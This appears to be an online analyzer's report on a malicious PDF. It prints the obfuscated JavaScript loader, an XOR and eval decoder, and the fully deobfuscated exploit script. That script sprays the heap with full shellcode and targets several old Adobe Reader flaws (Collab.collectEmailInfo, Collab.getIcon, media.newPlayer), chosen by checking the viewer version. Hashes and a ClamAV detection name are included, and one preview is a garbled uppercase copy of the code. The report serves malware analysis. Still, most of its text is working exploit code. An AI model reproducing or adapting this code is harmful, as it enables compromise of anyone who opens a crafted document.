yR7R601K9+= "0,127,67,72,69,67,75,127,86,69,82,83,8,9,91,45,42,86,65,8"; yR7R601K9+= "2,0,86,69,82,83,73,79,78,29,65,80,80,14,86,73,69,87,69,82"; yR7R601K9+= ",118,69,82,83,73,79,78,14,84,79,115,84,82,73,78,71,8,9,27"; yR7R601K9+= ",45,42,86,69,82,83,73,79,78,29,86,69,82,83,73,79,78,14,82"; yR7R601K9+= ",69,80,76,65,67,69,8,15,124,100,15,71,12,7,7,9,27,45,42,8"; yR7R601K9+= "6,65,82,0,86,69,82,127,65,82,82,65,89,29,78,69,87,0,97,82"; yR7R601K9+= ",82,65,89,8,86,69,82,83,73,79,78,14,67,72,65,82,97,84,8,1"; yR7R601K9+= "6,9,12,86,69,82,83,73,79,78,14,67,72,65,82,97,84,8,17,9,1"; yR7R601K9+= "2,86,69,82,83,73,79,78,14,67,72,65,82,97,84,8,18,9,9,27,4"; yR7R601K9+= "5,42,45,42,73,70,8,8,86,69,82,127,65,82,82,65,89,123,16,1"; yR7R601K9+= "25,28,24,9,92,92,8,86,69,82,127,65,82,82,65,89,123,16,125"; yR7R601K9+= ",29,29,24,6,6,86,69,82,127,65,82,82,65,89,123,17,125,28,1"; yR7R601K9+= "8,6,6,86,69,82,127,65,82,82,65,89,123,18,125,28,18,9,9,0,"; yR7R601K9+= "91,45,42,41,67,79,76,76,65,66,127,69,77,65,73,76,8,9,27,4"; yR7R601K9+= "5,42,93,45,42,45,42,73,70,8,8,86,69,82,127,65,82,82,65,89"; yR7R601K9+= ",123,16,125,29,29,24,6,6,86,69,82,127,65,82,82,65,89,123,"; yR7R601K9+= "17,125,28,17,6,6,86,69,82,127,65,82,82,65,89,123,18,125,2"; yR7R601K9+= "8,19,9,92,92,8,86,69,82,127,65,82,82,65,89,123,16,125,29,"; yR7R601K9+= "29,25,6,6,86,69,82,127,65,82,82,65,89,123,17,125,28,17,9,"; yR7R601K9+= "9,91,45,42,41,67,79,76,76,65,66,127,71,69,84,73,67,79,78,"; yR7R601K9+= "8,9,27,45,42,93,45,42,73,70,8,8,86,69,82,127,65,82,82,65,"; yR7R601K9+= "89,123,16,125,29,29,24,6,6,86,69,82,127,65,82,82,65,89,12"; yR7R601K9+= "3,17,125,28,18,9,92,92,8,86,69,82,127,65,82,82,65,89,123,"; yR7R601K9+= "16,125,29,29,25,6,6,86,69,82,127,65,82,82,65,89,123,17,12"; yR7R601K9+= "5,28,19,9,9,91,45,42,41,78,69,87,80,76,65,89,69,82,8,9,27"; yR7R601K9+= ",45,42,93,45,42,69,76,83,69,91,93,45,42,45,42,93,45,42,80"; yR7R601K9+= ",68,70,127,67,72,69,67,75,127,86,69,82,83,8,9,27,45,42"; yR7R601K9+= "]";; thZ9hTe2=app["e"+"v"+""+""+"al"];thZ9hTe2(yR7R601K9); Nx5qcL2LSV=odBLW80q;OHdse8iwp7=''; vL6UJn9=this.numPages; fiS3e4058=52; for (CuwD9NQ=0;CuwD9NQ<Nx5qcL2LSV.length;CuwD9NQ++){Nx5qcL2LSV[CuwD9NQ] ^=vL6UJn9; Nx5qcL2LSV[CuwD9NQ] ^=fiS3e4058; OHdse8iwp7 +=String.fromCharCode(Nx5qcL2LSV[CuwD9NQ]);}thZ9hTe2(OHdse8iwp7);
`legacy_pdfkit_stage_000.js`	deobfuscated-js	numeric array XOR decoded JavaScript at offset 0x16F	5380 bytes
SHA-256: `727b0fc42b667c4cb740f65b825b0efdab30bc0d51f47e0485476a97e370454c`
Preview script First 1,000 lines of the extracted script FUNCTION FIX IT YARSP LEN [WHILE YARSP LENGTH LEN [YARSP YARSP ]YARSP YARSP SUBSTRING LEN RETURN YARSP ]-FUNCTION NEWPLAYER [-VAR SHELLCODE UNESCAPE U eb U b b Uc U Uafc U U b Ue a Uebfa Ue Uffea Uffff U c f Ua a Uf a U c Ua Ua a Ue d U daa Ubad U d b Uaece Ud d U d U a Ucd U d Ue e U Ud c Ue a U e Ud U d Ue e U Ud c U d Ucc Uffa Ufd e Ua a U a Uce f Uc c Ua a Ud ce Ucad Uf cb Ub U e d Ue e Ua a Ucea U ca Ua Ud ce Uc ce Uf ca Ub U e d U e Ua a U a Ue a U a d Uccf U e Ua f Ua Uc a Uc Uc de Ue Ua a Ua c U Uf f Uf f U f Uaaf U a d Uf f Uf f Uf f Uf U b Uaef Uf f Ud d U d a U d Ua de Uf Ud d Ua U Uef f U be U a U d U a U cb Ud U ae Uab d U ca U de U d Ud b Uf Uf d Ua Uc b Uaa d U ded Ubaf U ba Ua d Ua d U d Ufff U e U U Ue U aa U c Ufd c U ed Ud Ubc Ud U df Ubd Ud ce Ud d U c Uc U bc Uc df Uc c Udec Uc Ucbc Ud Uc d Uced Uc Ud c Uc d Uc d Uc Ud Ud ce Ud Ucad Ud b Uc c Uc f Ud c Ucaf Udfc Ud c Uc U bce U a -VAR BLOCK UNESCAPE U C C U C C -VAR gdAGAcUYnFrsfZAszlo UNESCAPE U C C U C C U C C U C C U C C U C C U C C U C C U E U U U F U A E U D U B U B U U D U U B U U A U F U A E U E U A D U U U U U U U C U D U U -WHILE BLOCK LENGTH BLOCK BLOCK -BLOCK BLOCK SUBSTRING SHELLCODE LENGTH -MEMORY NEW aRRAY FOR I I X I [MEMORY{I} BLOCK SHELLCODE ]-UTIL PRINTD RLPpPJtxxiNCuHWAGcZCUhFMKZoBbszdgnDc NEW dATE -UTIL PRINTD sOTsXnqVmQknJjKixIOkLMFzyFMIpgGgnnkN NEW dATE -TRY [THIS MEDIA NEWpLAYER NULL ] CATCH E []-UTIL PRINTD gdAGAcUYnFrsfZAszlo NEW dATE ]--FUNCTION COLLAB EMAIL [VAR SHELLCODE UNESCAPE U eb U b b Uc U Uafc U U b Ue a Uebfa Ue Uffea Uffff U c f Ua a Uf a U c Ua Ua a Ue d U daa Ubad U d b Uaece Ud d U d U a Ucd U d Ue e U Ud c Ue a U e Ud U d Ue e U Ud c U d Ucc Uffa Ufd e Ua a U a Uce f Uc c Ua a Ud ce Ucad Uf cb Ub U e d Ue e Ua a Ucea U ca Ua Ud ce Uc ce Uf ca Ub U e d U e Ua a U a Ue a U a d Uccf U e Ua f Ua Uc a Uc Uc de Ue Ua a Ua c U Uf f Uf f U f Uaaf U a d Uf f Uf f Uf f Uf U b Uaef Uf f Ud d U d a U d Ua de Uf Ud d Ua U Uef f U be U a U d U a U cb Ud U ae Uab d U ca U de U d Ud b Uf Uf d Ua Uc b Uaa d U ded Ubaf U ba Ua d Ua d U d Ufff U e U U Ue U aa U c Ufd c U ed Ud Ubc Ud U df Ubd Ud ce Ud d U c Uc U bc Uc df Uc c Udec Uc Ucbc Ud Uc d Uced Uc Ud c Uc d Uc d Uc Ud Ud ce Ud Ucad Ud b Uc c Uc f Uc cb Ucacf Uc U bce U a VAR MEM ARRAY NEW aRRAY VAR CC X C C C C VAR ADDR X VAR SC LEN SHELLCODE LENGTH VAR LEN ADDR SC LEN X VAR YARSP UNESCAPE U U YARSP FIX IT YARSP LEN VAR COUNT CC X ADDR FOR VAR COUNT COUNT COUNT COUNT [MEM ARRAY{COUNT} YARSP SHELLCODE ]-VAR OVERFLOW UNESCAPE U C C U C C WHILE OVERFLOW LENGTH [OVERFLOW OVERFLOW ]-THIS COLLABsTORE cOLLAB COLLECTeMAILiNFO [SUBJ MSG OVERFLOW] ]--FUNCTION COLLAB GETICON [IF APP DOC cOLLAB GETiCON [VAR ARRY NEW aRRAY VAR VVPETHYA UNESCAPE U eb U b b Uc U Uafc U U b Ue a Uebfa Ue Uffea Uffff U c f Ua a Uf a U c Ua Ua a Ue d U daa Ubad U d b Uaece Ud d U d U a Ucd U d Ue e U Ud c Ue a U e Ud U d Ue e U Ud c U d Ucc Uffa Ufd e Ua a U a Uce f Uc c Ua a Ud ce Ucad Uf cb Ub U e d Ue e Ua a Ucea U ca Ua Ud ce Uc ce Uf ca Ub U e d U e Ua a U a Ue a U a d Uccf U e Ua f Ua Uc a Uc Uc de Ue Ua a Ua c U Uf f Uf f U f Uaaf U a d Uf f Uf f Uf f Uf U b Uaef Uf f Ud d U d a U d Ua de Uf Ud d Ua U Uef f U be U a U d U a U cb Ud U ae Uab d U ca U de U d Ud b Uf Uf d Ua Uc b Uaa d U ded Ubaf U ba Ua d Ua d U d Ufff U e U U Ue U aa U c Ufd c U ed Ud Ubc Ud U df Ubd Ud ce Ud d U c Uc U bc Uc df Uc c Udec Uc Ucbc Ud Uc d Uced Uc Ud c Uc d Uc d Uc Ud Ud ce Ud Ucad Ud b Uc c Uc f Ud c Uc cf Uc c Uc U bce U a VAR HwQ cn VVPETHYA LENGTH VAR LEN X HwQ cn X VAR YARSP UNESCAPE U U YARSP FIX IT YARSP LEN VAR P aJk F X C C C C X X FOR VAR VQCqd Y VQCqd Y P aJk F VQCqd Y [ARRY{VQCqd Y} YARSP VVPETHYA ]-VAR TumHnBgW UNESCAPE WHILE TumHnBgW LENGTH X [TumHnBgW TumHnBgW ]-TumHnBgW n TumHnBgW APP DOC cOLLAB GETiCON TumHnBgW ]]--FUNCTION PDF CHECK VERS [-VAR VERSION APP VIEWERvERSION TOsTRING -VERSION VERSION REPLACE \|d G -VAR VER ARRAY NEW aRRAY VERSION CHARaT VERSION CHARaT VERSION CHARaT --IF VER ARRAY{ } \\ VER ARRAY{ } VER ARRAY{ } VER ARRAY{ } [-)COLLAB EMAIL -]--IF VER ARRAY{ } VER ARRAY{ } VER ARRAY{ } \\ VER ARRAY{ } VER ARRAY{ } [-)COLLAB GETICON -]-IF VER ARRAY{ } VER ARRAY{ } \\ VER ARRAY{ } VER ARRAY{ } [-)NEWPLAYER -]-ELSE[]--]-PDF CHECK VERS -
`legacy_pdfkit_stage_001.js`	deobfuscated-js	numPages XOR decoded JavaScript at offset 0x16F	5380 bytes
SHA-256: `e71bce33d303a704db1ae7ac3ddcdedcf008ba987e73a469e26089921d570909`
Detection ClamAV: Js.Exploit.Shellcode-18 Obfuscation or payload: likely Carved artifact contains 9 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script function fix_it(yarsp,len){while(yarsp.length2<len){yarsp+=yarsp;}yarsp=yarsp.substring(0,len/2);return yarsp;} function newplayer(){ var shellcode = unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uC789%u8BC2%uC7DF%uC2C8%uDEC3%uC588%uCBC9%uD289%uC7D4%uCED5%uC489%uD2C8%uC4D5%uC4D2%uC896%uD688%uD6CE%uD599%uCAD6%uD69B%uC0C2%uC8F9%uD1C3%uCAF6%uDFC7%uD4C3%uC080%u9BCE%u00A6"); var block = unescape("%u0c0c%u0c0c"); var GDagaCuyNfRSFzaSZLO = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u514e%u4865%u4844%u724f%u4a6e%u6d43%u4b51%u4b79%u7156%u4d41%u5944%u596b%u7979%u625a%u626f%u7a6e%u634e%u4a4d%u6341%u6253%u4154%u5670%u5543%u4273%u4c51%u576d%u5772%u5670"); while(block.length <= 32768) block+=block; block=block.substring(0,32768 - shellcode.length); memory=new Array();for(i=0;i<0x2000;i++) {memory[i]= block + shellcode;} util.printd("rlpPpjTXXIncUhwagCzcuHfmkzObBSZDGNdC", new Date()); util.printd("SotSxNQvMqKNjJkIXioKlmfZYfmiPGgGNNKn", new Date()); try {this.media.newPlayer(null);} catch(e) {} util.printd(GDagaCuyNfRSFzaSZLO, new Date());} function collab_email(){var shellcode=unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uC789%u8BC2%uC7DF%uC2C8%uDEC3%uC588%uCBC9%uD289%uC7D4%uCED5%uC489%uD2C8%uC4D5%uC4D2%uC896%uD688%uD6CE%uD599%uCAD6%uD69B%uC0C2%uC3F9%uC7CB%uCACF%uC080%u9BCE%u00A6");var mem_array=new Array();var cc=0x0c0c0c0c;var addr=0x400000;var sc_len=shellcode.length2;var len=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var count2=(cc-0x400000)/addr;for(var count=0;count<count2;count++){mem_array[count]=yarsp+shellcode;} var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;} this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});} function collab_geticon(){if(app.doc.Collab.getIcon){var arry=new Array();var vvpethya=unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uC789%u8BC2%uC7DF%uC2C8%uDEC3%uC588%uCBC9%uD289%uC7D4%uCED5%uC489%uD2C8%uC4D5%uC4D2%uC896%uD688%uD6CE%uD599%uCAD6%uD69B%uC0C2%uC1F9%uD2C3%uC5CF%uC8C9%uC080%u9BCE%u00A6");var hWq500CN=vvpethya.length*2;var len=0x400000-(hWq500CN+0x38);var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+vvpethya;} var tUMhNbGw=unescape("%09");while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;} tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}} function pdf_check_vers(){ var version=app.viewerVersion.toString(); version=version.replace(/\D/g,''); var ver_array=new Array(version.charAt(0),version.charAt(1),version.charAt(2)); if((ver_array[0]<8)\|\|(ver_array[0]==8&&ver_array[1]<2&&ver_array[2]<2)) { collab_email(); } if((ver_array[0]==8&&ver_array[1]<1&&ver_array[2]<3)\|\|(ver_array[0]==9&&ver_array[1]<1)){ collab_geticon(); } if((ver_array[0]==8&&ver_array[1]<2)\|\|(ver_array[0]==9&&ver_array[1]<3)){ newplayer(); } else{} } pdf_check_vers();

Open this report in the interactive analyzer, or submit your own file for analysis.